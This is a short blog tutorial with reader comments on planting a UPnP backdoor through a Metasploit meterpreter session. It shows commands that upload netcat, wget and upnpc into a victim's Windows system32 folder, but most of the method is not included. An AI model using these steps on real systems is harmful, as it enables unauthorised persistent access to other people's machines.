How To Hack Firewall With Metasploit

How To Hack Firewall With Metasploit
Today I Will Expose How To Create A Backdoor That You Can Use When You Want Through UpNp.

Primarily To Better Understanding Here Is Diagram Of The Topology Of The  Network That I Use For My Presentation. 
 YOU CAN DOWNLOAD UPNPC-STATIC HERE DIRECT LINK

Code:
meterpreter>upload /root/binup/nc.exe c:\\windows\\system32
meterpreter>upload /root/binup/upnpc-static.exe c:\\windows\\system32
meterpreter>upload /root/binup/wget.exe c:\\windows\\system32












Conclusion


UPnP is very dangerous

Even today, the UPnP IGD is enabled by default on many router.


I have read other articles dealing with the flaws in UPnP integrate flash or flaws XSS.
The best way to guard against this kind of attack is simply to disable it...

We Hope That You Have Learned Something From this Tutorial By Computer 3xperts...

If You Have any Question or Problem Simply Just Comment Below Or :






6 comments :

  1. Hi thanks for this good tuto ,but me personally i use kali and i just don't find this /pentest/windows-binaries/tool
    it was there in backtrack but in kali i just don't find the good path .
    Any help is welcome .

    Thanks

    ReplyDelete
  2. We are very Glad That You Commented and Need some help yes actually kali and backtrack have different features some features which were not very important were removed in kali but you can use Backtrack 5r3 kali linux has also many features but some old unused features are removed that's why you can't find it bcktrack 5r3 is more user friendly than kali linux i hope you learned something from this tutorial please share it :)

    ReplyDelete
  3. Ok thanks for the help ,but i only have kali installed on HDD on this small netbook .I just hate microsoft OS .
    I will try back to backtrack.


    ReplyDelete
  4. Ok i have Found it here

    usr/share/windows-binaries

    ReplyDelete
  5. ohhh that's great it might help others too

    ReplyDelete
  6. thank same me difficult . i can't found pentest folder

    ReplyDelete